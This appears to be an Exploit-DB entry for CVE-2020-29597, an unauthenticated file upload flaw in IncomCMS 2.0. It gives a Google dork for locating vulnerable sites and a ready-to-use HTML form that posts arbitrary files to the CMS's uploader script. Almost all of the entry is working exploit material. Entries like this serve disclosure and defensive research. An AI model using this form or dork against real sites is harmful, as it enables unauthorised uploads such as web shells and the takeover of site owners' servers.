IncomCMS 2.0 - Insecure File Upload

EDB-ID:

49351




Platform:

Multiple

Date:

2021-01-05


# Exploit Title:  IncomCMS 2.0 - Insecure File Upload
# Google Dork: intext:"Incom CMS 2.0"
# Date: 07.12.2020
# Exploit Author: MoeAlBarbari
# Vendor Homepage:  https://www.incomcms.com/
# Version: 2.0
# Tested on: BackBox linux
# CVE: CVE-2020-29597

<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">
    <p>Upload your file</p>
    <input type="file" name="Filedata"></input><br />
    <input type="submit" value="Upload"></input>
  </form>
</body>
</html>